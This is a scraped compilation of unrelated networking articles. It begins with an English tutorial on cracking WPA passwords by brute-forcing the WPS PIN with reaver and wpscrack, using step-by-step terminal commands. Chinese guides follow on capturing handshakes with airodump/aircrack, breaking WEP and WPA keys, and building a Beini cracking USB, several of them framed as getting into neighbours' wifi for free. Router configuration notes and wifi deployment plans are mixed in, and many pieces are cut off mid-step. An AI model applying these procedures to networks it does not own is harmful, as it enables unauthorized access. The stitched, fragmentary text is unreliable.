How to Hack WPA WiFi Passwords by Cracking the WPS PIN
How to Hack WPA WiFi Passwords by Cracking the WPS PIN
Posted By
Alex Long4618 months ago
Follow
595959
KUDOS
A flaw in WPS, or W iFi P rotected S etup, known about for over a year by TNS, was
finally exploited with proof of concept code. Both TNS, the discoverers of the
exploit and Stefan at .braindump have created their respective "reaver" and
"wpscrack" programs to exploit the WPS vulnerability. From this exploit, the WPA
password can be recovered almost instantly in plain-text once the attack on the
access point WPS is initiated, which normally takes 2-10 hours (depending on
which program you use).
This exploit defeats WPS via an intelligent brute force attack to the static WPS
PIN. By guessing the PIN, the router will actually throw back, whether or not the
first four digits (of eight) are correct. Then, the final number is a checking number
used to satisfy an algorithm. This can be exploited to brute force the WPS PIN,
and allow recovery of the WPA password in an incredibly short amount of time, as
opposed to the standard attack on WPA.
In this Null Byte, let's go over how to use both tools to crack WPS. As of yet, no
router is safe from this attack, and yet none of the vendors have reacted and
released firmware with mitigations in place. Even disabling WPS still allows this
attack on most routers.
Requirements
?Linux OS
? A router at home with WPS
?The following programs installed (install by package name): aircrack-ng, python-pycryptopp, python-scapy, libpcap-dev
Tools
?Reaver(support for all routers)
?wpscrack(faster, but only support for major router brands)
Crack WPS
Text in bold is a terminal command.
Follow the guide that corresponds to the tool that you chose to use below.
Reaver
1.Unzip Reaver.
?unzip reaver-1.3.tar.gz
2.Change to the Reaver directory.
?cd reaver-1.3
3.Configure, compile and install the application.
?./configure && make && sudo make install
4.Scan for an access point to attack, and copy its MAC address for later
(XX:XX:XX:XX:XX:XX).
?sudo iwlist scan wlan0
5.Set your device into monitor mode.
?sudo airmon-ng start wlan0
6.Run the tool against an access point.
?reaver -i mon0 -b
7.Wait until it finishes.
This tool makes it too easy.
wpscrack.py
1.Make the program an executable.
?chmod +x wpscrack.py
2.Scan for an access point to attack, and copy its MAC address for later
(XX:XX:XX:XX:XX:XX).
?sudo iwlist scan wlan0
3.Get your MAC address, save it for later.
?ip link show wlan0 | awk '/ether/ {print $2}'
4.Set your device into monitor mode.
?sudo airmon-ng start wlan0
5.Attack your AP.
?wpscrack.py –iface mon0 –client
Now, let's hope we see a lot of firmware update action going on in the near future, or else a lot of places are in a whole world of trouble.
无线WiFi以及WLAN技术介绍
无线WiFi以及WLAN技术介绍 IEEE 802.11b无线网络规范是IEEE 802.11网络规范的变种,最高带宽为11 Mbps,在信号较弱或有干扰的情况下,带宽可调整为5.5Mbps、2Mbps和1Mbps,带宽的自动调整,有效地保障了网络的稳定性和可靠性。其主要特性为:速度快,可靠性高,在开放性区域,通讯距离可达305米,在封闭性区域,通讯距离为76米到122米,方便与现有的有线以太网络整合,组网的成本更低。 WiFi Wireless Fidelity,无线保真,同属于在办公室和家庭中使用的短距离无线技术。该技术使用的使2.4GHz附近的频段,该频段目前尚属没用许可的无线频段。其目前可使用的标准有两个,分别是IEEE802.11a和IEEE802.11b。该技术由于有着自身的优点,因此受到厂商的青睐。 WiFi技术突出的优势在于: 其一,无线电波的覆盖范围广,基于蓝牙技术的电波覆盖范围非常小,半径大约只有50英尺左右15米,而WiFi的半径则可达300英尺左右100米,办公室自不用说,就是在整栋大楼中也可使用。最近,由Vivato公司推出的一款新型交换机。据悉,该款产品能够把目前WiFi无线网络300英尺接近100米4英里 6.5公里。 其二,虽然由WiFi技术传输的无线通信质量不是很好,数据安全性能比蓝牙差一些,传输质量也有待改进,但传输速度非常快,可以达到11mbps,符合个人和社会信息化的需求。 其三,厂商进入该领域的门槛比较低。厂商只要在机场、车站、咖啡店、图书馆等人员较密集的地方设置“热点”,并通过高速线路将因特网接入上述场所。这样,由于“热点”所发射出的电波可以达到距接入点半径数十米至100米的地方,用户只要将支持无线LAN 的笔记本电脑或PDA拿到该区域内,即可高速接入因特网。也就是说,厂商不用耗费资金来进行网络布线接入,从而节省了大量的成本。 根据无线网卡使用的标准不同,WiFi的速度也有所不同。其中IEEE802.11b最高为11Mbps(部分厂商在设备配套的情况下可以达到22Mbps),IEEE802.11a为54Mbps、IEEE802.11g也是54Mbps WiFi是由AP(Access Point)和无线网卡组成的无线网络。AP一般称为网络桥接器或接入点,它是当作传统的有线局域网络与无线局域网络之间的桥梁,因此任何一台装有无线网卡的PC均可透过AP去分享有线局域网络甚至广域网络的资源,其工作原理相当于一个内置无线发射器的HUB或者是路由,而无线网卡则是负责接收由AP所发射信号的CLIENT端设备。 而wireless b/g表示网卡的型号,按照其速度与技术的新旧可分为802.11a、802.11b、802.11g 。
手把手教你蹭网卡--破解WPA2加密无线网络
手把手教你WPA2加密无线网络 【IT168专稿】随着无线技术的逐步成熟以及无线设备价格的平民化大众化,越来越多的家庭开始使用WLAN这种无线局域网的方式实现随时随地上网冲浪。不过网络安全问题也随之诞生,虽然一些有一定计算机和网络安全水平的用户开始使用WEP或WPA密钥来加密传输的数据包,但是WEP的破解相当容易,据说国外专业人士可以在2分钟内通过工具截获WEP加密过的数据包并解析出WEP密钥来。而以前一直让我们百分之百放心的WPA加密也不再安全。今天我们就来了解下如何暴力破解WPA加密密钥,让用户体会一次盾坚矛更利的感受。 一、实验环境网络拓扑简介: 本文主要采取的是暴力破解WPA加密密钥的方法,这就需要网络中存在足够多的经过WPA加密过的数据包,因此本人选择了一台计算机专门提供这种加密过的数据包,即该计算机与网络中的无线路由器通过WPA验证后不停的通讯。在此基础上再通过另外一台计算机窃取加密数据包并暴力破解。具体设备如下。 AP:D-Link DWL-2000AP+A,负责设置WPA加密信息。 无线客户端:笔记本+D-Link DWL-G122无线网卡,负责保证持续不断的WPA 数据通讯。 监听/破解机:笔记本+NetGear WAG511v2无线网卡,担任捕捉登陆‘握手’会话并破解出KEY的机器。 二、手把手教你暴力破解WPA密文: 不管是破解WPA加密数据还是WEP加密数据我们都需要找到专门的监听和分析软件,类似于有线网络中的sniffer,在无线网络中我们破解主要使用名为
WinAirCrack的强大工具。我们在以前讲解破解WEP密文时已经为各位介绍了该软件的简单使用以及软件下载地址,感兴趣的读者可以查询之前的文章。 安全危机轻松破解无线网络WEP密码上篇 安全危机轻松破解无线网络WEP密码下篇 WinAircrackPack--下载 第一步:下载WinAirCrack程序并解压缩,然后根据之前的文章下载自己无线网卡对应的驱动,将驱动升级为基于atheros芯片的无线网卡。具体方法需要我们到https://www.360docs.net/doc/306933167.html,/support/downloads/drivers这个地址下载适合自己无线网卡品牌的驱动。 第二步:无线网卡准备工作完毕后打开WinAirCrack程序安装主目录,运行其中的airdump.exe。
关于锐捷路由器配置命令
关于锐捷路由器配置命令,这些命令可能用的都不是很多,但是对于网络安全和性能来说很重要。 1. #Exit返回上一级操作模式 2. #del flash:config.text删除配置文件(交换机及1700系列路由器) 3. #erase startup-config删除配置文件(2500系列路由器) 4. #write memory 或copy running-config startup-config 保存配置 5. #Configure terminal 进入全局配置模式 6. (config)# hostname routerA配置设备名称为routerA 7.(config)#banner motd &配置每日提示信息&为终止符 8. (config)# enable secret star或者:enable password star 9.设置路由器的特权模式密码为star;secret 指密码以非明文显示, password指密码以明文显示 10.锐捷路由器配置命令之查看信息 11. #show running-config 查看当前生效的配置信息 12. #show interface fastethernet 0/3查看F0/3端口信息 13. #show interface serial 1/2 查看S1/2端口信息 14. #show ip interface brief 查看端口信息 15. #show version查看版本信息 16.#show running-config 查看当前生效的配置信息 17. #show controllers serial 1/2 查看该端口信息 , 用于R2501 18. #show ip route 查看路由表信息 19. #show access-lists 1查看标准访问控制列表1的配置信息 20.锐捷路由器配置命令之远程登陆(telnet) 21. (config)# line vty 0 4 进入线路0~4的配置模式, 4为连续线路最后一位的编号,线路为0~4 22. (conifg-line)#login 23. (config-line)#password star配置远程登陆密码为star 24. (config-line)#end返回上层 25. 锐捷路由器配置命令之端口的基本配置 26. (config)#Interface fastethernet 0/3 进入F0/3的端口配置模式 27. (config)#interface range fa 0/1-2进入F01至F0/2的端口配置模式 28. (config-if)#speed 10 配置端口速率为10M,可选10,100,auto 29. (config-if)#duplex full配置端口为全双工模式, 可选full(全双工),half(半双式),auto(自适应) 30. (config-if)#no shutdown 开启该端口 31. (config)# interface serial 1/2 进入端口S1/2的配置模式 32. (config-if)# ip address 1.1.1.1 255.255.255.0 配置端口IP及掩码 33.(config-if)# clock rate 64000 配置时钟频率(单位为K , 仅用于DCE端) 34.(config-if)# bandwidth 512 配置端口带宽速率为512KB(单位为KB) 35. (config-if)# no shutdown 开启该端口 36. (config-if)#encapsulation PPP 定义封装类型为PPP,可选项: 37. Frame-relay 帧中继 38. Hdlc 高级数据链路控制协议 39. lapb X.25的二层协议
家庭wifi解决方案
家庭wifi解决方案 篇一:wifi无线覆盖方案 “十方会”无线覆盖方案 客户需求 1、达到整个别墅的全区域无线覆盖。保证信号没有死掉! 2、方便用户对整个网络系统的管理、维护。 3、客户系统后期升级、扩展性好。 4、无线局域网实现无间断漫游功能(瘦AP+AC可以实现)。 5、2个别墅之间的草坪的露天场所也需要做无线覆盖 6、用户要分开2个独立的网络,一个是公司内部的办公网络(不允许外来客户访问),一个是免费给用户提供的无线网络,供用户免费使用。 无WIFI不酒店 吃饭上菜后第一个动作是神马?拿起筷子?NO你OUT 啦!环顾四周,吃饭第一大事是牌子!旅游的意义是在于放松和休闲吗?当微博朋友圈充满了好友们游山玩水,观海酒店,舌尖上的美食、、、终于了解这个一个爱“显摆“的世界啦。 然而对于一些有特色的酒店来讲,这是时下最流行的
微博营销。 如果今天你出差OR旅行,入住了一个没有WIFI的酒店,然后会发生什么?、、、哦,大概是没有然后了、、、酒店行业迎来了春天,团购也好,神秘房,LASTMINUTE 也罢,因为要满足手机、PAD的广泛普及和无线技术的飞速发展,住客除了对酒店硬件设施、服务水平的要求之外,对无线网络的需求从可选到必备----出差的商务人群需要第一时间利用无线网络首发邮件,处理公事;旅游的人们需要利用无线网络上传照片,同时查询旅游咨询等。酒店是否能为客人提供安全、稳定、高效的无线网络,成为了目前我们大家选择酒店的重要因素。 越来越被认可的WIFI观念、驱动着酒店无线网络的发展。然而。追逐无线浪潮并非盲目跟风,在为酒店搭建无线网络之前,酒店经营者应该先搞清楚以下几点问题,从而选择真正是和自己酒店的无线网络。 一:无线网络,能为酒店做什么? 酒店的无线网络,不仅为客户提供了上网的WIFI信号,还能为酒店实现以下几点功能: 1,无线点餐;点餐员在点菜同时完成输单过程,避免点餐人员的来回跑动,工作效率极大提 高;无线点餐和厨房出品自动打印功能,使服务人员
教你怎么破解别人的无线网络密码 手把手跟我操作就可以啦 很管用
如何破解无线网络密码 随着社会的进步!WIFI上网日益普及,特别是大城市中随便在一个小区搜索一下就能找到好多热点,搜索到热点然后链接上去那么我们就可以尽情的享受免费上网服务了。 不过除了公共场所以及菜鸟用户之外几乎所有的WIFI信号都是加密的,很简单换作是你你也不愿意把自己的带宽免费拿出来给别人用,所以如果你搜索到你附近有热点想免费上网的话请仔细往下学习... 破解静态WEP KEY全过程 首先通过NetStumbler确认客户端已在某AP的覆盖区内,并通过AP信号的参数进行‘踩点’(数据搜集)。
通过上图的红色框框部分内容确定该SSID名为demonalex的AP为802.11b类型设备,Encryption属性为‘已加密’,根据802.11b所支持的算法标准,该算法确定为WEP。有一点需要注意:NetStumbler对任何有使用加密算法的STA[802.11无线站点]都会在Encryption属性上标识为WEP算法,如上图中SSID为gzpia的AP使用的加密算法是WPA2-AES。 我们本次实验的目的是通过捕捉适当的数据帧进行IV (初始化向量)暴力破解得到WEP KEY,因此只需要使用airodump.exe(捕捉数据帧用)与WinAircrack.exe(破解WEP KEY用)两个程序就可以了。 首先打开ariodump.exe程序,按照下述操作:
首先程序会提示本机目前存在的所有无线网卡接口,并要求你输入需要捕捉数据帧的无线网卡接口编号,在这里我选择使用支持通用驱动的BUFFALO WNIC---编号 ‘26’;然后程序要求你输入该WNIC的芯片类型,目前大多国际通用芯片都是使用‘HermesI/Realtek’子集的,因此选择‘o’;然后需要输入要捕捉的信号所处的频道,我们需要捕捉的AP所处的频道为‘6’;提示输入捕捉数据帧后存在的文件名及其位置,若不写绝对路径则文件默认存在在winaircrack的安装目录下,以.cap 结尾,我在上例中使用的是‘last’; 最后winaircrack提示:‘是否只写入/记录IV[初始化向量]到cap文件中去?’,我在这里选择‘否/n’;确定以上步骤后程序开始捕捉数据包。 下面的过程就是漫长的等待了,直至上表中‘Packets’列的总数为300000时即可满足实验要求。根据实验的经验所得:当该AP的通信数据流量极度频繁、数据流量极大时,‘Packets’所对应的数值增长的加速度越大。当程序运行至满足 ‘Packets’=300000的要求时按Ctrl+C结束该进程。 此时你会发现在winaircrack
wifi无线覆盖方案
“十方会”无线覆盖方案 客户需求 1、达到整个别墅的全区域无线覆盖。保证信号没有死掉! 2、方便用户对整个网络系统的管理、维护。 3、客户系统后期升级、扩展性好。 4、无线局域网实现无间断漫游功能(瘦AP+AC可以实现)。 5、2个别墅之间的草坪的露天场所也需要做无线覆盖 6、用户要分开2个独立的网络,一个是公司内部的办公网络(不允许外来客户访问),一个是免费给用户提供的无线网络,供用户免费使用。 无WIFI不酒店 吃饭上菜后第一个动作是神马?拿起筷子?NO你OUT啦!环顾四周,吃饭第一大事是牌子!旅游的意义是在于放松和休闲吗?当微博朋友圈充满了好友们游山玩水,观海酒店,舌尖上的美食、、、终于了解这个一个爱“显摆“的世界啦。 然而对于一些有特色的酒店来讲,这是时下最流行的微博营销。 如果今天你出差OR旅行,入住了一个没有WIFI的酒店,然后会发生什么?、、、哦,大概是没有然后了、、、 酒店行业迎来了春天,团购也好,神秘房,LASTMINUTE也罢,因为要满足手机、PAD的广泛普及和无线技术的飞速发展,住客除了对酒店硬件设施、服务水平的要求之外,对无线网络的需求从可选到必备----出差的商务人群需要第一时间利用无线网络首发邮件,处理公事;旅游的人们需要利用无线网络上传照片,同时查询旅游咨询等。酒店是否能为客人提供安全、稳定、高效的无线网络,成为了目前我们大家选择酒店的重要因素。 越来越被认可的WIFI观念、驱动着酒店无线网络的发展。然而。追逐无线浪潮并非盲目跟风,在为酒店搭建无线网络之前,酒店经营者应该先搞清楚以下几点问题,从而选择真正是和自己酒店的无线网络。 一:无线网络,能为酒店做什么? 酒店的无线网络,不仅为客户提供了上网的WIFI信号,还能为酒店实现以下几点功能:1,无线点餐;点餐员在点菜同时完成输单过程,避免点餐人员的来回跑动,工作效率极大提高;无线点餐和厨房出品自动打印功能,使服务人员从人工跑单中解脱出来;传统的点餐管理要求服务人员开据3联单或多单,成本较高。使用无线点餐系统,无需手工开单,节约开单成本。 2,无线POS 3,无线语音服务 4,无线视频监控: 5,无线视频巡更: 6,行李服务 7,智能客房。
基于wifi的无线组网技术
基于WIFI的无线网状(Mesh)组网技术 摘要: 目前, 无线局域网由于相对有线网络的众多优点受到广泛应用, 其中WiFi 因高效的工作能力而受到热捧, 但是WiFi 由于支持范围有限, 使得它的发展受到一定程度的限制, 这里对该问题进行了研究。在不添加有线基础设施、扩大成本的情况下, 考虑将网上的无线设备作路由器使用, 对数据进行不断转发, 通过多个无线跳来进行组网, 即利用无线网状( Mesh)组网技术, 在低成本的条件下, 大大的扩展无线信号的覆盖范围。考虑到无线网状组网技术在当前市场上的应用,其业务支持能力和性能方面的优势, 证明了想法提出的合理性机可行性。基于WiFi的无线网状(Mesh)组网技术不仅具有WiFi本身的优势, 还解决了W iFi 的覆盖范围小的问题, 因此会有广泛的应用空间和很好的发展前景。 关键词: 无线网状网络;无线局域网;WiFi;无线跳 1.WiFi技术的探讨与研究 WIFI全称Wireless Fidelity,意思是无线保真技术。又称802.11b 标准,该技术使用的是2.4GHz附近的频段。它的最大优点就是传输速度较高,可以达到11Mbps,在信号较弱或有干扰的情况下,带宽可调整为5.5Mbps、、2Mbps和1Mbps,带宽的自动调整,有效地了网络的稳定性和可靠性。其主要特性为:速度快,可靠性情况高,在开放性区域,通讯距离可达305米,在封闭性区域,通讯距离为76米到122米,方便与有线以太网络整合,组网的成本更低。同时它还能与已有的各种 802.11 DSSS 设备良好的兼容。 1.1 WIFI 现状及特点 WIFI 无线宽带计入技术有以下几个特点: (1)WIFI 的覆盖半径可达300 英尺左右,约合 100 米,办公室自不用说,就是在整栋大楼中也可使用。(2)传输速度快,虽然有时WIFI 传输的无线通信质量不是很好,但传输速率比较快,可以达到11 Mbps,如果无线网卡使用的标准不同的话,WIFI 的速度也会有所不同。(3)建网成本低:只要在机场、车站、咖啡店、图书馆等人员比较密集的地方设置“热点”,并通过高速线路将因特网接入上述场所。(4)更健康更安全:IEEE802.11 实际发射功率约 60~70 毫瓦,而手机的发射功率约 200 毫瓦至 1 瓦间,手持式对讲机高达 5 瓦,而且 WIFI 无线网络使用方式并非像手机直接接触人体,对人体的辐射较小,使用起来应该是绝对安全的。 1.2 WIFI 技术剖析 1.2.1 WIFI 的网络构成。站点(Station),网络最基本的组成部分。 基本服务单元(Basic Service Set,BSS)。网络最基本的服务单元。最简单的服务单元可以只由两个站点组成。站点可以动态的连接(associate)到基本服务单元中。 分配系统(Distribution System,DS)。分配系统用于连接不同的基本服务单元。分配系统使用的媒介(Medium)逻辑上和基本服务单元使用的媒介是截然分开的,尽管它们物理上可能会是同一个媒介,例如同一个无线频段。接入点(Acess Point,AP)。接入点既有普通站点的身份,又有介绍如到分配系统的功能。扩展服务单元(Extended Service Set,ESS)。由分配系统和基本服务单元组合而成。这种组合是逻辑上,并非物理上的。不同的基本服务单元物有可能在
无线网卡模拟AP功能设置指南
无线网卡模拟AP功能设置指南 本文适用于无线网卡:MW150U 4.0、MW150U 6.0、MW150UM 1.0、MW150US 1.0、MW300U 2.0、MW3030U1.0 无线AP可以为传统的有线局域网提供无线扩展接入,而一般的无线网卡只能作为客户端连接到无线AP。我司部分无线网卡具有模拟AP功能,不单可以作为无线客户端连接上无线网络,也可以切换为模拟AP,供其他无线客户端连接。其典型应用场景如下: 在没有无线路由器的情况下,电脑通过有线连接到宽带线路已经可以上网。电脑上安装具有模拟AP 功能的无线网卡,并设置共享可以访问互联网的网络连接,模拟AP与可以访问互联网的网络连接就虚拟出一个“无线路由器”。其他的无线设备如笔记本、手机、PAD等就可以无线连接上模拟AP共享上网了。 下面以MW300U为例介绍模拟AP功能以及虚拟无线路由器的设置方法,如下图所示。
步骤一安装无线网卡驱动和客户端软件,安装完成之后,如下图所示。 步骤二启用模拟AP功能。 1. 选择客户端软件中的“高级”选项。
2. SoftAP模式,选择“开”,提示“确认打开SoftAP模式”,点击“确认”。会显示“正在设置SoftAP模式,请稍后”,然后会提示“正在设置SoftAP模式成功”。 3. 配置模拟AP参数,如下图所示,本例中我们通过“本地连接”上网,配置完成之后点击“应用”。
Internet连接共享:当电脑上存在多个网络连接时,选择用于连接到互联网的网络连接,本例中以“本地连接”为例,选择本地连接对应的网卡作为“虚拟无线路由器”的WAN接口。 网络名称:网卡工作在SoftAP模式时发出来的无线网络名称(SSID),即无线设备搜索到模拟AP的无线网络名称。 安全模式:模拟AP的无线加密类型,推荐选择WPA2-PSK。 密码类型:无线网络的加密算法,推荐选择AES。 安全密钥:连接模拟AP时需要输入的无线网络密码。 IP地址:无线网卡的IP地址,在开启SoftAP模式时,自动生成,保持默认即可。 设置好上面的参数之后,点击“应用”。接着右键点击桌面“网上邻居”选择“属性”,打开“网络连接”,可以看到“本地连接”已经共享。 步骤三无线连接到SoftAP。电脑搜索无线网络,选中“SoftAP”,输入前面设置的“安全密钥”。
无线WiFi网络布网方案
无线WiFi网络布网方案 目前公司对于无线网络需求较大,但现有无线网络还不能满足公司需求,所以我提出以下解决方案: 网络拓扑图如下: 方案所需设备:8口POE交换机、无线控制器AC 、无线ap、六类网线(其他设备已有) 设备采购方案
设备采购方案一: 方案说明:此方案采用无线ap由poe交换机供电,布线简单,减少了寻找供电电源产生问题。所有无线ap由无线控制器ac进行管理,可远程下发配置、修改相关配置参数、远程重启无线ap、自动检测信道冲突、自动负载均衡等。 此方案组建为百兆无线网络,公司出口带宽为50m,适合公司网络环境,Tp-link无线设备稳定可靠,同时价格低廉,适合中小型公司使用,可满足公司目前对无线的需求,解决现有问题。AC控制器最多支持200台无线AP,满足了日后可扩充的需求。每个AP支持30用户(最大支持100用户),目前方案可以支持210个终端,基本可以在公司形成无死角全覆盖的无线网络。
设备采购方案二: 方案说明:此方案设备均采用华为网络设备,组成千兆无线网络。无线控制器AC集成了POE供电模块,不需要独立购买POE 交换机,AC拥有8个GE口,提供4Gbit/s的转发能力,可管理128个AP,接入2K无线终端;可通过网管eSight、WEB网管、命令行(CLI)进行维护。华为AP支持双频(2.4GHz,5GHz),防水等级:IP31,支持整机最大用户数达到64个。 相对于方案一来说华为的方案拥有高容量、高可用、高性能等特点,但是价格更高,根据公司目前的情况,个人认为用华为的方案有点性能过剩,会有资源浪费。
设备选择还可以有很多品牌和种类,以上两种是具有代表性的方案。设备选择最终由公司决定,以上所有设备价格均为市场参考价格,不含税,不含安装等产生的费用。 (注:文档可能无法思考全面,请浏览后下载,供参考。可复制、编制,期待你的好评与关注)
使用Aircrackng破解WPAPSK加密无线网络
使用Aircrack-ng破解WPA-PSK加密无线网络 结合上小节的内容,下面继续是以BackTrack4 R2 Linux为环境,讲述破解WPA-PSK加密无线网络的具体步骤,详细如下。 步骤1:升级Aircrack-ng。 前面在第一章1.3节我们已经讲述了升级Aircrack-ng套装的详细步骤,这里也是一样,若条件允许,应将Aircrack-ng升级到最新的Aircrack-ng 1.1版。由于前面我已经给出了详细的步骤,这里就不再重复。 除此之外,为了更好地识别出无线网络设备及环境,最好对airodump-ng的OUI库进行升级,先进入到Aircrack-ng的安装目录下,然后输入命令如下: airodump-ng-oui-update 回车后,就能看到如下图23所示的开始下载的提示,稍等一会儿,这个时间会比较长,恩,建议预先升级,不要临阵磨枪。 图23 步骤2:载入并激活无线网卡至monitor即监听模式。 在进入BackTrack4 R2系统后,载入无线网卡的顺序及命令部分,依次输入下述命令: startx 进入到图形界面 ifconfig –a 查看无线网卡状态 ifconfig wlan0 up 载入无线网卡驱动 airmon-ng start wlan0 激活网卡到monitor模式 如下图24所示,我们可以看到无线网卡的芯片及驱动类型,在Chipset芯片类型上标明是 Ralink 2573芯片,默认驱动为rt73usb,显示为“monitor mode enabled on mon0”,即已启动监听模式,监听模式下适配器名称变更为mon0。
奶瓶Beini使用教程
奶瓶(beini)这个系统,是一款基于 Tiny Core Linux 搭建的无线网络安全测试系统,当然由于它是用来安全测试的系统,因此在安全方面自然有着强大的功能。而且,这个系统非常简便易学,因此现在已经逐渐的取代BT3、BT4之类的工具,而逐渐成为了无线网络安全研究的主流系统。相比于其它的系统,“奶瓶(beini)”最大的优点除了操作简便易懂之外,还有一个优点就是制作U盘启动盘非常容易,而且成功率较高。 首先要下载一个“奶瓶(beini)”系统,下载好的“奶瓶(beini)”系统是一个iso文件,而大小只有40MB左右,因此我们可以轻易的使用镜像软件将其写入U盘。这里,我们使用了UltraISO这款软件,相比其它的同类型软件,这款显得要简便易懂很多。 我们需要一个U盘,先把它格式化了,格式化完成之后,制作成奶瓶(beini)系统,需要注意的是,必须格式化成FAT格式!(貌似大于2GB的U盘不适用。)
导入镜像文件之后,选择写入方式 请选择USB-HDD+模式写入!
写入速度很快,一分钟不到 但是有时候选择直接写入之后,电脑并不能成功从U盘启动“奶瓶
(beini)”。因此如果制作不成功之后,我们还需要选择手工加载引导文件。 我们首先需要将下载的“奶瓶(beini)”的.iso文件解压缩,然后在如上图所示的目录中找到引导文件,然后再进行加载,如此操作之后,再进行U盘的写入。(很多新手都是在这个环节卡壳,基础要打好啊)
重启电脑之后,按DEL键进入BIOS设置界面,在这里我们要选择从U 盘启动,以让电脑从“奶瓶(beini)”系统启动。 如果你能看到上面的这个画面,那U盘启动盘就制作成功了,稍后片刻,我们即可进入“奶瓶(beini)”中。
教你破解WAP2无线路由器SSID密码
关于“奶瓶”的介绍。。https://www.360docs.net/doc/306933167.html,/bbs/index.php 既然说到蹭网,首先让我们来看看我们需要准备什么东西。首先是一个电脑一台路由器一个这类的废话我们就不多说了,现在我们需要的是一个U盘,别小于128MB就行。 将其格式化 先把它格式化了,需要注意的是,一定要选择FAT格式,这点一定要记住,否则下面就没办法继续进行了。格式化完成之后,下面就让我们向着周围的路由器们发起进攻吧。 绰号“奶瓶”的Linux系统 奶瓶这个系统,相信玩无线的朋友应该都会知道。这是一款基于 Tiny Core Linux 搭建的无线网络安全测试系统,当然由于它是用来安全测试的系统,因此在安全方面自然有着强大的功能。而且,这个系统非常简便易学,因此现在已经逐渐的取代BT3、BT4之类的工具,而逐渐成为了无线网络安全研究的主流系统。今天,我们就要应用这个系统来完成后面的事情。 制作“奶瓶”启动U盘
相比于其它的系统,“奶瓶”最大的优点除了操作简便易懂之外,还有一个优点就是制作U盘启动盘非常容易,而且成功率较高。 UltraISO软件界面 下载好的“奶瓶”系统是一个.iso文件,而大小只有40MB左右,因此我们可以轻易的使用镜像软件将其写入U盘。这里,我们使用了UltraISO这款软件,相比其它的同类型软件,这款显得要简便易懂很多。
导入镜像文件之后,选择写入方式 写入速度很快,一分钟不到 加载引导文件 但是有时候选择直接写入之后,电脑并不能成功从U盘启动“奶瓶”。因此如果制作不成功之后,我们还需要选择手工加载引导文件。
引导文件位置 我们首先需要将下载的“奶瓶”的.iso文件解压缩,然后在如上图所示的目录中找到引导文件,然后再进行加载,如此操作之后,再进行U盘的写入。 进入“奶瓶”系统 修改BIOS设置
linux wifi命令
linux wifi命令 modprobe <相应的无线网卡驱动> //你的udev如果正确识别的话,这步可以免去 iwconfig //查看无线网卡设备名称,常见的无线网卡的标识可能为ra0、ath0、wlan0等,但是一般不会是eth0; ifconfig <无线网卡名称> up //启动这个无线网卡eg:ifconfig ath0 up iwlist ath0 scan | less //查看可接入的无线热点 下面的不翻译了,自己看吧很简单的(其实下面这些步骤都可以用networkmanage这个图形化软件实现): Specify the id of the wireless network with iwconfig
E61I最详细的WIFI无线上网方法分享(截图+说明)
E61I最详细的WIFI无线上网方法分享(截图+说明) 入手牛腰阿姨已经四天了,从选机到买机再到玩机都在dospy这潜水学习,在各位热心人士的帮助下我终于知道了证书是咋回事,也终于在看了lee版主的视频教程后成功申请到了属于自己的证书,在此对所有热心的GGJJ表示衷心的感谢. 好了,费话就不多说了,这几天发现论坛里有很多人都在问关于如何利用WIFI无线上网,我在这就分享下我的经验吧。 (我可是连证书都没弄明白就已经使用WIFI连接本本的无线上网了,MS十分简单的一件事情。) 首先讲下我的硬件设备:HP本本、E61I、电信moden, 上网方法:E61I的WIFI连接本本的无线网卡,再通过本本的有线网卡连接moden上网。 地址分配情况:本本的有线网卡 IP 192.168.0.2 子网掩码 255.255.255.0 网关 192.168.0.1 (注意:这里是moden的IP地址) 主DNS 202.96.134.133 (这里是填当地电信提供的DNS地址,偶是深圳的) 辅DNS 202.96.128.68 (同上) 有了上述的基础设置后,我们就可以来配置无线网络了,先从本本开始吧。 右键点击[网上邻居] -> [属性] 同时选中 [本地连接]和[无线网络连接] ,再右键选择 [桥接] 如图: 完成设置后,如图:
接着,设置无线网卡的信息 如图: 选择 [无线网络配置] -> [添加] 如图红色圈圈:
为我们的无线连接定义一个 [SSID] ,如图:
确定后,再选择 [高级],如图:
在跳出的对话框中,选择 [仅计算机到计算机],如图: 之后确定,退出,电脑的无线设置已完成,接着我们就要开始设置E61I, [功能表] -> [工具] -> [设置] -> [连接设置] -> [接入点] 进入 [接入点] 页面后,[选项] -> [新增接入点] -> [使用默认设置]
电脑自带无线网卡发射wifi信号的方法
电脑自带无线网卡发射wifi信号的方法 这里给大家一个笔记本等电脑自带无线网卡如何发射wifi信号的教程,需要win7系统。首先,先确认你的网卡是这几种型号,在设备管理器里查看,设备管理器在我的电脑右键管理,然后你就会看到了。 目前支持的设备有: Atheros AR5005GS (as in the TP-Link TL-WN651G) Atheros AR5007EG with 8.0.0.238 firmware Broadcom 4310-series (in many Dell laptops) D-link AirPlus G DWL-G510 Wireless PCI Adapter (driver version 3.0.1.0) Intel 5100/5300 (with latest drivers from Intel's site, version 13.0.0.107, 64bit systems only) Ralink RT2870 (in many 802.11n USB dongles) Realtek RTL8187SE (with the drivers that came with Windows 7) Realtek RTL8192u with 1370(Beta) 基本上你的网卡标有AP发射的都可以。 打开开始菜单附件的命令提示符,右键用管理员权限打开。 然后输入如下内容(建议直接复制过去右键黏贴) netsh wlan set hostednetwork mode=allow ssid="Win7 AP" key=12345678
宿舍无线wifi网络解决方案设计
宿舍区无线网络解决方案 联系人: 技术: 400服务电话: 网址: 地址:
目录 第一章需求分析 (1) 1.1应用需求 (1) 第二章宿舍WIFI覆盖建议方案 (1) 2.1网络部署 (1) 2.3 AP部署 (2) 2.3.1宿舍网络设备布置 (2) 2.3.2特点 (2) 第三章设计原则 (3) 3.1网络拓扑设计 (3) 3.1.1旁路接入模式优点 (4) 3.1.2 统一集中管理 (4) 第四章 WiFi网络的可靠性及其应用 (4) 4.1可靠性,可扩展性 (4) 4.2全面保障无线局域网安全 (4) 4.3智能化的网络管理机制 (5) 4.4多SSID,员工、顾客网络逻辑隔离 (5) 4.5 Web认证、微信广告 (5) 第五章方案优势 (7) 5.1 便捷的网络部署,统一的网络配置和管理 (7) 5.2 AP零配置 (7) 5.3 AP间的无缝漫游 (7) 5.5升级AP方便 (7) 第六章艾泰产品介绍 (8)
6.1 出口路由器介绍 (8) 6.2 AP产品介绍 (8) 6.3 无线AC控制器 (9)
第一章需求分析 1.1应用需求 主要应用为: 1、提供宿舍员工约300余人,并发数约250余人无线WIFI连接上网。 2、WIFI网络能基本满足供闲余上网浏览网页、或小视频之用。 3、基本上网行为统一管理:如时间控制、流量控制、带宽分配等 4、AP零配置安装,便于维护 5、实现网络的集中化管理,方便网管对网络运行状态的集中监控管理,易于策略配置、策略调整等统一发布。 第二章宿舍WIFI覆盖建议方案 2.1网络部署
